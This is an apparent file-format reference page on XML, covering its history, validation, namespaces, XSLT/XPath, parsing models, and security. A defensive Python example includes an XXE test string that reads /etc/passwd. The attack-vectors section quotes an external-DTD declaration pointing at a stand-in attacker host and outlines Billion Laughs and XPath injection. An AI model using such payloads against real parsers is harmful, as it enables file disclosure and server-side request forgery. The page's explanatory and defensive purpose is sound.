Extensible Markup Language
XML encodes structured data as nested elements with attributes in human-readable, machine-parseable plain text. Standardized by the W3C in 1998, XML underpins document formats (DOCX, SVG), RSS feeds, SOAP services, banking standards (ISO 20022), and ZATCA e-invoicing — even as JSON dominates web APIs.
Conversion not yet available. XML transformation requires XSLT or schema-aware processing — features under consideration for a future update.
Common questions
Why does my browser show 'This XML file does not appear to have any style information associated with it'?
This message appears when you open a raw XML file directly in a browser without an associated stylesheet. It is not an error: the browser has no instructions for visual rendering, so it displays the raw document tree instead. You commonly see this with XML sitemaps, RSS feeds, or API responses. The file itself is well-formed; a malformed file would produce a parse error instead.
What is the difference between XML and JSON?
XML uses matched opening and closing tags with attributes, supports namespaces, and offers formal schema validation through XSD. JSON uses a lighter curly-brace syntax that maps directly to programming language objects. JSON is 30 to 50 percent smaller for equivalent data and dominates modern web APIs, while XML remains essential in enterprise systems and regulated industries.
What is XXE injection and why is XML considered high-risk?
XXE injection exploits the DOCTYPE entity declaration to read server files or trigger requests to internal network resources. The related Billion Laughs attack uses nested internal entity expansion to turn a few hundred bytes into gigabytes of memory consumption. Mitigation requires disabling external entity resolution and DTD processing in the parser configuration before handling untrusted input.
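One way to apply that mitigation is to refuse any untrusted document that carries a DOCTYPE at all. The following is a minimal sketch using only the Python standard library; `parse_untrusted` and `DoctypeForbidden` are hypothetical names introduced for illustration, and a production system would more likely rely on a hardened parser configuration or a vetted library.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this handler as soon as it reaches <!DOCTYPE ...>,
    # before any entity declared in the DTD can be referenced or fetched.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in untrusted input")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE (hypothetical helper)."""
    scanner = xml.parsers.expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(data, True)  # raises DoctypeForbidden or ExpatError
    return ET.fromstring(data)


SAFE = b"<order><id>42</id></order>"
HOSTILE = (
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<order><id>&xxe;</id></order>"
)

print(parse_untrusted(SAFE).find("id").text)
try:
    parse_untrusted(HOSTILE)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

Rejecting the DOCTYPE outright is stricter than disabling entity resolution, but it blocks both external entities and nested entity expansion with a single check.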
Is XML still used or has JSON replaced it?
JSON replaced XML for most web APIs, but XML remains deeply embedded in infrastructure. Every DOCX and XLSX file contains XML internally. SVG graphics, RSS feeds, Android manifests, Maven builds, banking wire transfers (ISO 20022), and Saudi ZATCA e-invoicing all run on XML, and healthcare data exchange (HL7 FHIR) supports it alongside JSON. The format lost surface visibility but is arguably more entrenched than ever.
What is the difference between well-formed and valid XML?
Well-formed XML follows syntax rules: proper nesting, quoted attributes, a single root element, and correct escaping of special characters. Valid XML is well-formed and additionally conforms to a schema (XSD, DTD, or RELAX NG) that defines permitted elements, attributes, and data types. A document can be well-formed without being valid.
How do I open and view an XML file?
Most desktop web browsers display well-formed XML as a collapsible tree view. Text editors like VS Code, Notepad++, and Sublime Text provide syntax highlighting. For validation, use xmllint on the command line or an XML-aware editor like Oxygen XML Editor. XML is plain text, so even the simplest text editor can open it.
What is XSLT and how does it relate to XML?
XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet matches nodes in the source XML using template rules and outputs transformed content — HTML for web pages, a different XML vocabulary for system integration, or plain text for reports. XSLT is widely used in publishing workflows and enterprise data pipelines.
What makes .XML special
Descended from SGML
Before XML existed, enterprises structured documents with SGML (Standard Generalized Markup Language), an ISO standard published in 1986. SGML was powerful but notoriously complex — its full specification ran to over 500 pages, and building a conformant parser required deep expertise. When the web exploded in the mid-1990s, the W3C assembled a working group led by Jon Bosak of Sun Microsystems to create a language that kept SGML's core strengths — self-describing structure, validation, extensibility — while discarding its complexity. The result, published as a W3C Recommendation on February 10, 1998, was XML 1.0. The design committee articulated ten principles in the specification's introduction: XML shall be straightforwardly usable over the internet, support a wide variety of applications, be compatible with SGML, make it easy to write programs that process XML documents, keep optional features to an absolute minimum, be human-legible and reasonably clear, be prepared quickly, be formal and concise, be easy to create, and treat terseness as being of minimal importance. That last point explains XML's verbosity — a deliberate design choice favoring clarity over compactness.
Well-formedness versus validity
XML enforces two tiers of document correctness. A document is well-formed if it follows the syntax rules: every opening tag has a matching closing tag (or uses self-closing syntax), elements nest without overlapping, attribute values are quoted, and exactly one root element exists. Every conformant XML parser rejects documents that are not well-formed — there is no error-recovery mode equivalent to HTML's lenient parsing.
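The strictness described above is easy to observe. As a small sketch using Python's standard-library parser (the helper name `is_well_formed` and the sample strings are made up for illustration), each violation of the syntax rules makes the parser raise an error instead of attempting recovery:

```python
import xml.etree.ElementTree as ET


def is_well_formed(text: str) -> bool:
    """Return True if the parser accepts the text as well-formed XML."""
    try:
        ET.fromstring(text)
    except ET.ParseError:
        return False
    return True


# One accepted document and one sample per broken syntax rule.
samples = {
    "ok": "<a><b>text</b><c/></a>",
    "overlapping elements": "<a><b></a></b>",
    "unquoted attribute": "<a id=1/>",
    "two root elements": "<a/><b/>",
    "missing closing tag": "<a><b></a>",
}

for label, doc in samples.items():
    print(f"{label}: {is_well_formed(doc)}")
```

This checks well-formedness only. It says nothing about whether the document conforms to any schema.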
A document is valid if it is well-formed and also conforms to a schema that defines which elements, attributes, and data types are permitted. Three schema languages compete for this role. DTD (Document Type Definition) is the oldest, inherited from SGML, and defines element grammar using a compact notation. XML Schema (XSD), published by the W3C in 2001, adds typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules that DTDs cannot express. RELAX NG, developed by James Clark and Murata Makoto, offers a simpler, more readable alternative that many developers prefer for hand-authored schemas. Most XML encountered in practice is well-formed but never validated against a schema.
Namespaces and compound documents
When a single XML document combines vocabularies from different sources (an SVG graphic embedded in an XHTML page, or invoice line items alongside digital signature elements), element names from different vocabularies might collide. XML namespaces solve this by binding prefixes to URIs. A SOAP envelope might use the SOAP namespace for its structure while the payload uses a UBL namespace for invoice elements. The xmlns attribute declares these bindings, and prefixed element names like cbc:IssueDate make the vocabulary origin explicit. Namespaces are essential in enterprise XML but are one of the features that make XML harder to work with than JSON, which has no namespace mechanism.
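To make the prefix-to-URI binding concrete, here is a short sketch with Python's standard library. The namespace URIs (`urn:example:...`) are placeholders chosen for this example, not the real UBL identifiers, and the document is a toy invoice.

```python
import xml.etree.ElementTree as ET

# Toy document mixing two vocabularies; both URIs are placeholders.
DOC = """\
<inv:Invoice xmlns:inv="urn:example:invoice"
             xmlns:cbc="urn:example:common-basic">
  <cbc:IssueDate>2024-01-15</cbc:IssueDate>
  <inv:Note>Net 30</inv:Note>
</inv:Invoice>
"""

# The lookup map binds prefixes used in queries to the same URIs.
NS = {"inv": "urn:example:invoice", "cbc": "urn:example:common-basic"}

root = ET.fromstring(DOC)
issue_date = root.find("cbc:IssueDate", NS)

print(root.tag)                 # parser stores the expanded {uri}local name
print(issue_date.text)
print(root.find("IssueDate"))   # unqualified lookup does not match
```

The parser identifies elements by URI plus local name, so the prefix in a query only has to map to the same URI; it does not need to match the prefix used in the document.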
Transformation and querying
XSLT (XSL Transformations) is a declarative language for converting XML documents into other formats. An XSLT stylesheet contains templates that match nodes in the source document and output transformed content — HTML for web display, a different XML vocabulary for system integration, or plain text for reporting. XSLT 1.0, published in 1999, remains widely deployed. XSLT 3.0, published in 2017, added streaming support for transforming documents larger than available memory.
XPath provides the query language that XSLT and other tools use to address nodes within an XML tree. An expression like //product[@category='electronics']/price selects price elements under product elements with a matching category attribute anywhere in the document. XPath 1.0 handles most practical queries. XQuery extends XPath into a full query language comparable to SQL for XML databases.
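The expression above can be tried against a small catalog. This sketch uses Python's `xml.etree.ElementTree`, which implements only a subset of XPath 1.0 and expects a relative path (`.//` rather than `//`) when searching from an element; the catalog data is invented for the example.

```python
import xml.etree.ElementTree as ET

# Invented sample data: two electronics products at different depths.
CATALOG = """\
<catalog>
  <product category="electronics"><name>Radio</name><price>25.00</price></product>
  <product category="books"><name>Atlas</name><price>40.00</price></product>
  <section>
    <product category="electronics"><name>Lamp</name><price>15.50</price></product>
  </section>
</catalog>
"""

root = ET.fromstring(CATALOG)

# ".//" searches all descendants of root; the predicate filters on the
# category attribute; "/price" then selects the matching child elements.
prices = [
    p.text
    for p in root.findall(".//product[@category='electronics']/price")
]
print(prices)
```

Both electronics prices are selected even though one product is nested inside a `section` element, because the descendant axis matches at any depth.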
DOM versus SAX parsing
Two fundamental parsing strategies exist for XML. DOM (Document Object Model) parsers read the entire document and build an in-memory tree structure that applications traverse and manipulate. This is convenient for small-to-medium documents but fails on large files because the tree consumes several times the document's file size in memory. SAX (Simple API for XML) parsers stream through the document, firing callbacks for start-element, end-element, and character-data events without building a tree. SAX is essential for processing multi-gigabyte XML feeds — financial transaction logs, scientific datasets, government data dumps — where DOM parsing would exhaust available memory. StAX (Streaming API for XML) provides a pull-based alternative where the application controls iteration.
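The difference between the two strategies can be sketched with Python's standard library. The feed below is synthetic, and `TxCounter` is a hypothetical handler written for this example: the SAX handler keeps only a running count and total, while the DOM parser materializes every node before anything can be queried.

```python
import xml.sax
from xml.dom import minidom

# Synthetic feed of 1000 transactions, built in memory for the demo.
FEED = b"<log>" + b"".join(
    b'<tx id="%d"><amount>%d</amount></tx>' % (i, i * 10) for i in range(1000)
) + b"</log>"


class TxCounter(xml.sax.ContentHandler):
    """Streams through the feed, holding only running totals in memory."""

    def __init__(self):
        super().__init__()
        self.count = 0
        self.total = 0
        self._in_amount = False
        self._buffer = []

    def startElement(self, name, attrs):
        if name == "tx":
            self.count += 1
        elif name == "amount":
            self._in_amount = True
            self._buffer = []

    def characters(self, content):
        # Character data may arrive in several chunks, so collect them.
        if self._in_amount:
            self._buffer.append(content)

    def endElement(self, name):
        if name == "amount":
            self.total += int("".join(self._buffer))
            self._in_amount = False


# SAX: callbacks fire as the parser advances; no tree is built.
handler = TxCounter()
xml.sax.parseString(FEED, handler)

# DOM: the whole document becomes an in-memory tree first.
dom = minidom.parseString(FEED)
dom_count = len(dom.getElementsByTagName("tx"))

print(handler.count, handler.total, dom_count)
```

Both approaches reach the same count here. The trade-off only becomes visible at scale, where the DOM tree's memory footprint grows with the document and the SAX handler's does not.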
Lost the API war, powers everything underneath
XML dominated web data interchange through the early 2000s. SOAP web services wrapped XML payloads in XML envelopes with XML schemas and XML security. The complexity was staggering. When REST architecture gained traction and JSON offered a simpler, more compact alternative that mapped directly to JavaScript objects, developers migrated en masse. By 2012, JSON had overtaken XML for new web APIs. Today, roughly 78% of public APIs use JSON.
But XML never disappeared. It retreated from the visible surface layer into the infrastructure. Every DOCX, XLSX, and PPTX file is a ZIP archive containing XML documents — rename one to .zip and extract it to see the XML inside. SVG, the web's vector graphics format, is XML. RSS and Atom feeds are XML. Android layouts and manifests are XML. Maven pom.xml files build most Java projects. SAML authentication assertions are XML. Banking wire transfers use ISO 20022 XML messages. Healthcare data exchanges run on HL7 FHIR, which supports XML alongside JSON. Saudi Arabia's ZATCA e-invoicing mandate requires UBL 2.1 XML for all electronic invoices. The narrative that "XML is dead" confuses the loss of API dominance with disappearance. XML is less visible but arguably more entrenched than ever in the systems that actually move money, documents, and data.
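The "rename to .zip" experiment can also be done programmatically. The sketch below uses Python's standard library; `xml_parts` is a hypothetical helper, and the archive built in memory is a simplified stand-in with made-up contents, not a real DOCX file. Passing the path of an actual DOCX to the same function should work the same way.

```python
import io
import zipfile
import xml.etree.ElementTree as ET


def xml_parts(archive) -> dict:
    """Map each .xml member of a ZIP archive to its root element tag."""
    roots = {}
    with zipfile.ZipFile(archive) as zf:
        for name in zf.namelist():
            if name.endswith(".xml"):
                roots[name] = ET.fromstring(zf.read(name)).tag
    return roots


# Stand-in archive: member names mimic a DOCX layout, contents are simplified.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("word/document.xml", "<document><body><p>Hello</p></body></document>")
    zf.writestr("word/media/image1.png", b"\x89PNG")
buf.seek(0)

parts = xml_parts(buf)
print(parts)
```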
Stability as a feature
XML 1.0 has had exactly five editions from its initial publication in 1998 to the Fifth Edition in 2008. Since then — nothing. No sixth edition, no breaking changes, no deprecations. This makes XML 1.0 one of the most stable specifications in the history of web technology. For archival and preservation contexts, where a format must remain readable for decades, this stability record is a significant advantage. The Library of Congress catalogs XML under FDD fdd000075 as a recognized preservation format.
.XML compared to alternatives
| Formats | Criterion | Details | Winner |
|---|---|---|---|
| .XML vs .JSON | Verbosity | JSON represents equivalent data in 30-50% fewer bytes by eliminating closing tags, attribute syntax, and namespace declarations. This makes JSON faster to parse and cheaper to transmit over networks. | JSON wins |
| .XML vs .JSON | Schema validation | XSD provides typed validation with inheritance, complex type definitions, namespace-aware constraints, and cardinality rules. JSON Schema is capable but less mature for multi-namespace enterprise document validation. | XML wins |
| .XML vs .HTML | Error handling | XML parsers reject malformed documents immediately, with no error recovery. HTML parsers are lenient by design, silently fixing unclosed tags and nesting errors. XML's strictness catches data corruption early. | XML wins |
| .XML vs .YAML | Enterprise adoption | XML dominates regulated industries: banking (ISO 20022), healthcare (HL7 FHIR), government (UBL invoicing), and legal (Akoma Ntoso). YAML is concentrated in DevOps and cloud-native tooling (Kubernetes, Docker Compose). | XML wins |
Technical reference
- MIME Type: application/xml
- Developer: World Wide Web Consortium (W3C)
- Year Introduced: 1998
- Open Standard: Yes
Binary Structure
XML is a text format with no binary structure or magic bytes. An XML document begins with an optional prolog: the XML declaration (<?xml version="1.0" encoding="UTF-8"?>) specifying the version and character encoding, followed by an optional DOCTYPE declaration referencing a DTD or defining inline entities. The document body consists of a single root element containing nested child elements delimited by matched start tags (<tag>) and end tags (</tag>), with empty elements using self-closing syntax (<tag/>). Elements carry attributes as name-value pairs within the start tag. Text content, CDATA sections (<![CDATA[...]]>), processing instructions (<?target data?>), and comments (<!-- ... -->) appear within or between elements. Namespaces use the xmlns attribute to partition element names into URI-identified vocabularies. UTF-8 is the default encoding when none is declared, and conformant parsers must also accept UTF-16. Files may begin with a UTF-8 BOM (EF BB BF) before the declaration, though the W3C recommends against it. Well-formedness requires proper nesting, quoted attribute values, and a single root element. PRONOM identifies XML as fmt/101 using the <?xml declaration as the primary signature.
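The pieces listed above can be seen together in one small document. The sketch below is illustrative only: the element names, the `render` processing instruction, and the `urn:example:notes` namespace are invented, and the parsing uses Python's standard library, which by default discards comments and processing instructions and merges CDATA into ordinary text.

```python
import xml.etree.ElementTree as ET

# Invented document showing: XML declaration, comment, processing
# instruction, default namespace, attribute, CDATA, and an empty element.
DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!-- a comment in the prolog -->
<?render mode="compact"?>
<note id="n1" xmlns="urn:example:notes">
  <title>Reminder</title>
  <body><![CDATA[Use <b> sparingly & escape nothing here]]></body>
  <sent/>
</note>
"""

NS = {"n": "urn:example:notes"}
root = ET.fromstring(DOC)

print(root.tag)                      # namespace-qualified root name
print(root.get("id"))                # attribute from the start tag
print(root.find("n:body", NS).text)  # CDATA content arrives as plain text
print(len(root.find("n:sent", NS)))  # empty element has no children
```

Inside the CDATA section, `<` and `&` need no escaping; the parser hands them to the application as literal characters.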
Attack Vectors
- XXE (XML External Entity) injection: DOCTYPE entity declarations can reference local files (file:///etc/passwd), internal network URLs (SSRF), or parameter entities that exfiltrate data to attacker-controlled servers. OWASP listed XXE as its own category (A4) in the 2017 Top 10 and merged it into Security Misconfiguration (A05) in the 2021 edition.
- Billion Laughs denial of service: exponentially expanding nested entity definitions (each referencing the previous ten times) consume gigabytes of RAM from a few hundred bytes of XML, crashing the parser and potentially the entire server.
- SSRF via external DTD: an XML document referencing an external DTD (<!DOCTYPE foo SYSTEM 'http://attacker.com/evil.dtd'>) causes the parser to fetch a remote resource, enabling server-side request forgery behind firewalls.
- XPath injection: user input concatenated into XPath expressions without sanitization allows authentication bypass and unauthorized data extraction from XML datastores, analogous to SQL injection for relational databases.
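The scale of the Billion Laughs expansion follows from simple arithmetic, sketched below in Python without building or parsing any payload. The function name and its parameters are made up for this example; the figures assume the classic form of the attack, in which a three-byte seed string is wrapped by nine entity levels that each reference the previous level ten times.

```python
def expanded_size(levels: int, fanout: int, seed: str = "lol") -> int:
    """Bytes produced when the outermost entity is fully expanded.

    Each level repeats the previous one `fanout` times, so the seed
    string ends up copied fanout ** levels times.
    """
    return len(seed.encode("utf-8")) * fanout ** levels


for levels in (3, 6, 9):
    size = expanded_size(levels, fanout=10)
    print(f"{levels} levels -> {size:,} bytes")
```

Nine levels with a fanout of ten yield a billion copies of the seed, about 3 GB of text, which is where the attack gets its name.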
Mitigation: FileDex processes XML files entirely in the browser using the native DOMParser API. No external entity resolution, no DTD fetching, no server-side parsing. The browser's sandboxed context prevents filesystem access and network requests from parsed entities.
- Specification: Extensible Markup Language (XML) 1.0 (Fifth Edition), W3C Recommendation
- Registry: XML (Extensible Markup Language), Library of Congress Format Description (fdd000075)
- Registry: Extensible Markup Language 1.0 (fmt/101), The National Archives PRONOM Registry
- Industry: XML External Entity Prevention Cheat Sheet, OWASP
- Specification: XML Media Types, RFC 7303 (IANA Registration)